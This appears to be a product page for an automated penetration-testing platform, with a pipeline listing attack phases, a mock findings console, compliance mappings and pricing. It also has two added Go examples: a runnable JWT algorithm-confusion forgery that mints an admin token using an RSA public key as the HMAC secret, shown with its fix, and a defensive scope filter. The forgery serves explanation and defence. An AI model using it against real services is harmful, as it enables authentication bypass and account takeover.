Continuous validation · Verifiable Wave 122 · v5.1

Continuous validation, live.

Enigma runs 33 phases of autonomous reconnaissance, attack-surface mapping, and exploit synthesis against your own assets — 24/7. No queue. No checklist. Real exploits, with proof.

33 phases
117K LOC Go pipeline
8+ AI providers
<5% FP, cross-validated
Platform / 02

What Enigma does.

Three jobs, run continuously against your perimeter and your authenticated surface. Every finding ships with a working PoC and a control mapping.

01 · Find what manual pentests miss.

An annual pentest captures one week of your perimeter. Enigma re-tests every 24 hours, on every deploy, and against every new subdomain that surfaced overnight. Coverage is continuous, not a calendar event.

02 · Prove every finding.

AutoSolver V2 chains recon, payload synthesis, and replay until an exploit lands. Each finding ships with a curl-replayable request, a byte-level response diff, and a screen recording where a browser was involved. No drive-by CVEs. No theoretical maybes.

03 · Map to controls automatically.

PCI DSS 4.0, SOC 2 Type II, OWASP Top 10, NIST 800-53 Rev 5, ISO 27001, and DORA mappings happen at write-time. Open a finding and see the controls it fails; open a framework and see the findings failing it. Bidirectional, always.

Mission control / 05

The operator console.

Calm, fast, dense — built for the SOC, not the marketer. Keyboard-first. Sub-second scan-state refresh. Every row is a link to a replayable exploit.

Operations command · https://enigma.sc/admin

All systems nominal
Active scans       12     ▲ +3 today
Total findings     247    ▲ +18 today
Critical issues    4      ▼ −2 today
Compliance score   87%    ▲ +2% this week
Active scans
Target               Phase                      Started   Status
api.acme.com         14 / 33 · WAF bypass       2h ago    ● Running
app.beta.io          33 / 33 · Complete         5h ago    Validated
vpn.gamma.net        22 / 33 · PoC generation   1h ago    ● Running
edge-gw.eu-west-2    queued                               Queued
internal.dashboards  33 / 33 · Complete         8h ago    Validated
Recent findings
Critical  F-9821  Blind SQL injection in /v2/users authenticated endpoint        api.acme.com/v2/users   12 min ago
High      F-9820  JWT public-key-as-HMAC signer accepts attacker-issued tokens   auth.acme.com           38 min ago
High      F-9819  Race condition on coupon redeem (HTTP/2 single-packet)         app.beta.io/checkout    1h ago
Medium    F-9818  Pug template injection on profile bio render                   app.beta.io/u/:id       2h ago
Low       F-9817  EXIF GPS coordinates leak from uploaded avatars                cdn.acme.com/avatars    3h ago
Compliance posture
PCI DSS 4.0      92%   395 / 428 controls
OWASP Top 10     88%   237 / 270 checks
SOC 2 Type II    95%   61 / 64 controls
NIST 800-53      81%   793 / 980 controls
Pipeline / 06

33 phases. Continuous.

The pipeline is a directed graph. Phases run in parallel where the dependencies allow, gated by tier and scope. The brain takes over from phase 30 onward.

Phase 00  OSINT credential intel
Phase 01  Subdomain enumeration
Phase 02  DNS + HTTP probe
Phase 03  Port scan
Phase 04  URL discovery
Phase 05  JS secrets
Phase 06  Parameter discovery
Phase 07  Nuclei vuln scan
Phase 08  Subdomain takeover
Phase 09  SQLi detection
Phase 10  XSS detection
Phase 11  SSRF + redirect + LFI
Phase 12  CORS testing
Phase 13  Directory bruteforce
Phase 14  Screenshots
Phase 15  Origin IP discovery
Phase 16  WAF detection & bypass
Phase 17  Advanced SQLi
Phase 18  bbot deep recon
Phase 19  XXE injection
Phase 20  NoSQL injection
Phase 21  HTTP smuggling
Phase 22  JWT attacks
Phase 23  GraphQL exploitation
Phase 24  CRLF / cache / proto
Phase 25  Exposed paths
Phase 26  Race condition
Phase 27  Security headers & Log4Shell
Phase 28  ZAP active scan
Phase 29  PoC verification
Phase 30  AI Red Team
Phase 31  AI auth-surface attacks
Phase 32  Juice Shop solver
Phase 33  Juice Shop browser solver
AI-piloted phases: AI Red Team (30) · AI auth-surface attacks (31) · AI-piloted CTF solver (32)
Coverage / 07

Tests that matter, mapped to controls.

Six frameworks, mapped at write-time. The same finding row drives the framework score, the executive summary, and the Jira ticket. One source of truth.

PCI DSS 4.0      92%    Continuous · 428 controls
OWASP Top 10     100%   Auto-mapped · 270 checks
SOC 2 Type II    95%    Gap analysis · 64 controls
NIST 800-53 r5   81%    Continuous · 980 controls
DORA             87%    EU financial · 5 pillars
ISO 27001        90%    Annex A · 93 controls
Wave 122 / 08

Twelve newest capabilities.

Shipped in the latest cut. Covered out of the box against the H1 2026 CVE classes: Pug template injection, JWT algorithm confusion, HTTP/2 single-packet races, DOM-XSS, Web3, EXIF and stego payloads.

01  Pug template injection escalator
02  JWT public-key-as-HMAC signer
03  Race-condition runner (HTTP/2 single-packet)
04  Headless browser solver (DOM-XSS, WS, Web3)
05  Socket.IO v4 client
06  EXIF GPS reverse-geocode
07  LSB steganography decoder
08  SHA-1 truncation coupon forger
09  Authenticated session capture / replay
10  Multi-tenant client switcher
11  SARIF / CycloneDX export
12  MITRE ATT&CK Navigator JSON layer
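Capability 02 above and finding F-9820 in the console mock name the same bug: a verifier that lets the token's own `alg` header choose the algorithm while holding a single key blob for all of them. The following is an added Go example showing the mechanism end to end; it is not Enigma's code and not part of the original page. It assumes the usual shape of the bug (RSA public key kept as PEM text, one `verify` routine that handles both RS256 and HS256), and every name in it (`forgeHS256`, `verify`, `Demo`) is hypothetical.

```go
package main

import (
	"crypto"
	"crypto/hmac"
	"crypto/rand"
	"crypto/rsa"
	"crypto/sha256"
	"crypto/x509"
	"encoding/base64"
	"encoding/json"
	"encoding/pem"
	"fmt"
	"strings"
)

var b64 = base64.RawURLEncoding // JWT segments are unpadded base64url

func segment(v map[string]string) string {
	raw, _ := json.Marshal(v) // maps marshal with sorted keys, so this is deterministic
	return b64.EncodeToString(raw)
}

func hmacSHA256(key []byte, input string) []byte {
	mac := hmac.New(sha256.New, key)
	mac.Write([]byte(input))
	return mac.Sum(nil)
}

// signRS256 mints a genuine token with the issuer's private key.
func signRS256(priv *rsa.PrivateKey, claims map[string]string) string {
	input := segment(map[string]string{"alg": "RS256", "typ": "JWT"}) + "." + segment(claims)
	h := sha256.Sum256([]byte(input))
	sig, err := rsa.SignPKCS1v15(rand.Reader, priv, crypto.SHA256, h[:])
	if err != nil {
		panic(err)
	}
	return input + "." + b64.EncodeToString(sig)
}

// forgeHS256 is the attacker's move: declare HS256 and use the public PEM bytes,
// which are not secret, as the HMAC key. No private key is needed.
func forgeHS256(pubPEM []byte, claims map[string]string) string {
	input := segment(map[string]string{"alg": "HS256", "typ": "JWT"}) + "." + segment(claims)
	return input + "." + b64.EncodeToString(hmacSHA256(pubPEM, input))
}

func verifyRSA(pubPEM []byte, input string, sig []byte) bool {
	block, _ := pem.Decode(pubPEM)
	if block == nil {
		return false
	}
	key, err := x509.ParsePKIXPublicKey(block.Bytes)
	pub, isRSA := key.(*rsa.PublicKey)
	if err != nil || !isRSA {
		return false
	}
	h := sha256.Sum256([]byte(input))
	return rsa.VerifyPKCS1v15(pub, crypto.SHA256, h[:], sig) == nil
}

// verify is the server side. With pinAlg=false it behaves like the vulnerable
// verifiers: the token's alg picks the algorithm and the same key blob is handed
// to it, so under HS256 the RSA public key becomes a shared secret the attacker
// already holds. With pinAlg=true the algorithm is fixed by the key type.
func verify(pubPEM []byte, token string, pinAlg bool) bool {
	parts := strings.Split(token, ".")
	if len(parts) != 3 {
		return false
	}
	rawHdr, err := b64.DecodeString(parts[0])
	sig, err2 := b64.DecodeString(parts[2])
	var hdr map[string]string
	if err != nil || err2 != nil || json.Unmarshal(rawHdr, &hdr) != nil {
		return false
	}
	input := parts[0] + "." + parts[1]
	switch {
	case hdr["alg"] == "RS256":
		return verifyRSA(pubPEM, input, sig)
	case hdr["alg"] == "HS256" && !pinAlg:
		return hmac.Equal(hmacSHA256(pubPEM, input), sig)
	}
	return false
}

// Demo returns (vulnerable accepts forgery, hardened accepts forgery, hardened accepts genuine).
func Demo() (vulnForged, hardForged, hardLegit bool) {
	priv, err := rsa.GenerateKey(rand.Reader, 2048)
	if err != nil {
		panic(err)
	}
	der, _ := x509.MarshalPKIXPublicKey(&priv.PublicKey)
	pubPEM := pem.EncodeToMemory(&pem.Block{Type: "PUBLIC KEY", Bytes: der}) // as apps usually store it
	forged := forgeHS256(pubPEM, map[string]string{"role": "admin", "sub": "attacker"})
	legit := signRS256(priv, map[string]string{"role": "user", "sub": "alice"})
	return verify(pubPEM, forged, false), verify(pubPEM, forged, true), verify(pubPEM, legit, true)
}

func main() { fmt.Println(Demo()) }
```

Run it and the unpinned path accepts a token nobody signed. The fix is not a stronger key but a pinned algorithm: the verifier decides RS256 from the key it holds, and a header claiming HS256 is rejected before any key material is touched. That is the confusion capability 02 probes for.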
MSSP / 09

Built for the MSSP.

One Enigma, many tenants. Per-customer scoping, per-customer reports, per-customer brand. The provider sees everything; the customer sees their surface only.

01 · Per-tenant scoping

RBAC + scope filter at every phase boundary. Out-of-scope assets are dropped before the recon stage even sees them.
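What "dropped before the recon stage even sees them" looks like in code, as an added Go example that is not Enigma's own implementation (the pipeline section above likewise describes phases gated by scope): a per-tenant scope filter with exact-host, wildcard and CIDR rules, excludes winning over includes, deny by default, and a `Gate` call that sits between two phases. All names (`ScopeFilter`, `Allow`, `Gate`) and the sample scope in `main` are constructed for illustration.

```go
package main

import (
	"fmt"
	"net/netip"
	"strings"
)

// rule is one scope entry: exact host, "*.example.com" wildcard (subdomains only,
// never the apex) or an IP prefix in CIDR form.
type rule struct {
	host   string
	suffix string // ".example.com"; the leading dot stops "acme.com.evil.net" matching
	prefix netip.Prefix
	isCIDR bool
}

func parseRule(s string) rule {
	s = strings.TrimSuffix(strings.ToLower(strings.TrimSpace(s)), ".")
	if p, err := netip.ParsePrefix(s); err == nil {
		return rule{prefix: p, isCIDR: true}
	}
	if strings.HasPrefix(s, "*.") {
		return rule{suffix: s[1:]}
	}
	return rule{host: s}
}

// matches takes a normalized asset: lower-case host or IP literal, no port.
func (r rule) matches(asset string) bool {
	switch {
	case r.isCIDR:
		a, err := netip.ParseAddr(asset)
		return err == nil && r.prefix.Contains(a)
	case r.suffix != "":
		// dot-boundary match: "api.acme.com" hits ".acme.com"; "acme.com" and "xacme.com" do not
		return len(asset) > len(r.suffix) && strings.HasSuffix(asset, r.suffix)
	}
	return asset == r.host
}

// ScopeFilter is a hypothetical per-tenant allow/deny list, not Enigma's own code.
type ScopeFilter struct{ include, exclude []rule }

func NewScopeFilter(include, exclude []string) *ScopeFilter {
	f := &ScopeFilter{}
	for _, s := range include {
		f.include = append(f.include, parseRule(s))
	}
	for _, s := range exclude {
		f.exclude = append(f.exclude, parseRule(s))
	}
	return f
}

// normalize lower-cases, strips a trailing dot and drops ":port" (host:port, ip:port, [v6]:port).
func normalize(asset string) string {
	asset = strings.TrimSuffix(strings.ToLower(strings.TrimSpace(asset)), ".")
	if ap, err := netip.ParseAddrPort(asset); err == nil {
		return ap.Addr().String()
	}
	if i := strings.LastIndex(asset, ":"); i > 0 && !strings.Contains(asset[:i], ":") {
		asset = asset[:i] // a bare IPv6 literal has several colons and is left alone
	}
	return asset
}

// Allow is the per-asset decision: an exclude match wins, and anything not
// explicitly included is out of scope (deny by default).
func (f *ScopeFilter) Allow(asset string) bool {
	asset = normalize(asset)
	for _, r := range f.exclude {
		if r.matches(asset) {
			return false
		}
	}
	for _, r := range f.include {
		if r.matches(asset) {
			return true
		}
	}
	return false
}

// Gate sits between two phases: what the next phase may see (order kept) and what was dropped, for the audit trail.
func (f *ScopeFilter) Gate(assets []string) (kept, dropped []string) {
	for _, a := range assets {
		if f.Allow(a) {
			kept = append(kept, a)
		} else {
			dropped = append(dropped, a)
		}
	}
	return kept, dropped
}

func main() { // constructed sample: one tenant's scope and what enumeration handed back
	f := NewScopeFilter([]string{"*.acme.com", "acme.com", "203.0.113.0/24"}, []string{"vpn.acme.com"})
	fmt.Println(f.Gate([]string{"api.acme.com", "vpn.acme.com", "acme.com.evil.net", "203.0.113.9:8443", "app.beta.io"}))
}
```

The two details worth copying are the dot-boundary wildcard (a naive suffix check would let `acme.com.evil.net` through) and the fact that `Gate` returns the dropped set as well as the kept one, so the tenant's audit trail can show what the scanner refused to touch.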

02 · White-label PDF reports

Per-tenant logo, palette, and intro letter. The PDF, the SARIF, the CycloneDX, and the customer portal all rebrand together.

03 · Customer self-serve portal

Customers see their findings, their replays, their compliance posture. Read-only by default; comment, accept-risk, and reopen are role-gated.

04 · SAML / OIDC + SCIM

Federated identity for the operator side, SCIM for user provisioning. The audit trail is signed and WORM-stored (write once, read many) per tenant.

Proof / 10

Numbers that hold up.

33 phases
1000+ test patterns
93/111 on the Juice Shop benchmark
<8 min typical scan wall-time on that benchmark

Numbers are from the Wave 122 build against the canonical OWASP Juice Shop benchmark. Real targets vary: production scans average 16 minutes wall time, dominated by the timing oracle in phase 09 (SQLi detection) and by phase 17 (advanced SQLi).

Pricing / 11

Three tiers. Hard limits.

Limits below are the actual values from the licensing engine. No asterisks. No "contact us for pricing on the homepage but the docs say otherwise" games.

Tier / 01
Community
Free — for the tinkerers and the curious.
  • 1 target
  • 3 scans per day
  • 16 phases (recon + core injection)
  • Basic AI triage
  • Free OSINT providers only
  • JSON + HTML reports
  • 1 user
Start free →
Tier / 02 · Most teams
Pro
For one security team running continuous validation.
  • 25 targets
  • Unlimited scans
  • All 33 phases — including the AI brain
  • All OSINT providers
  • HTML, PDF, JSON, SARIF reports
  • OWASP + PCI compliance mapping
  • API access · scheduling · unlimited users
Talk to engineering
Tier / 03
Enterprise
For MSSPs and regulated multi-tenant deployments.
  • Unlimited targets
  • Unlimited scans
  • All 33 phases
  • Bundled OSINT (no third-party keys)
  • HTML, PDF, JSON, SARIF, Caido, white-label
  • OWASP + PCI + SOC 2 + ISO 27001 + DORA
  • Multi-tenant · SAML / OIDC · SCIM
Talk to engineering
Ready / 12

Ready to validate?

Sign in with an existing operator account, or talk to the engineers who shipped the brain.